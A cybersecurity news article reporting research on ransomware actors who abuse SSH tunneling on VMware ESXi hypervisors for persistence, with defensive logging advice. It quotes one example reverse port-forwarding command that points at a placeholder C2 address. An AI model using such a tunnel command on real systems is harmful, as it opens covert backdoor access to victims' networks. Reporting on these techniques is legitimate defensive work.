Ransomware actors targeting ESXi hypervisors with SSH Tunneling for persistence

Ransomware actors targeting ESXi hypervisors with SSH Tunneling for persistence

Ransomware actors are increasingly targeting VMware ESXi bare-metal hypervisors, exploiting SSH tunneling to maintain persistent, undetected access to compromised systems.

According to cybersecurity firm Sygnia, threat actors are leveraging known vulnerabilities in ESXi appliances or exploiting compromised administrator credentials to gain initial access. Once inside, they exploit the hypervisor’s built-in SSH service, designed to allow system administrators to remotely manage the device. This service, however, is rarely monitored by many organizations, making it an attractive vector for attackers.

Ransomware actors are abusing the feature to establish persistence, move laterally within the network, and deploy ransomware payloads.

By using SSH tunneling, attackers can securely route traffic between the compromised hypervisor and external command-and-control (C2) servers.

For example, attackers can set up a remote port-forwarding configuration via SSH to establish a connection back to the C2 server, using a command such as ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. This allows attackers to tunnel through the hypervisor and remain undetected for prolonged periods.

“Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.

ESXi appliances use a distributed logging mechanism that separates log entries into multiple dedicated files, rather than consolidating them into one, as seen with traditional syslog formats. This approach, while organized, can complicate forensic investigations since logs are spread across various files.

To address this, configuring log forwarding from ESXi to an external syslog server is recommended for centralized monitoring and log retention. This setup ensures all relevant events are captured in one location. Key log files for investigating potential attacks, such as SSH tunneling, include /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log.


Back to the list

Latest Posts

Cyber Security Week in Review: February 14, 2025

Cyber Security Week in Review: February 14, 2025

In brief: Microsoft patches actively exploited zero-days, Chinese hackers Salt Typhoon exploit Cisco flaws, the US and partners sanction Zservers, and more.
14 February 2025
Russian Sandworm APT targets critical sectors in BadPilot multi-year campaign

Russian Sandworm APT targets critical sectors in BadPilot multi-year campaign

The 'BadPilot' campaign involves a series of targeted cyberattacks leveraging bugs in widely used IT infrastructure software.
13 February 2025
Four key distributors of encrypted communications service Sky ECC arrested in Spain and Netherlands

Four key distributors of encrypted communications service Sky ECC arrested in Spain and Netherlands

The two men arrested in Spain are accused of overseeing the global distribution of Sky ECC devices and software.
12 February 2025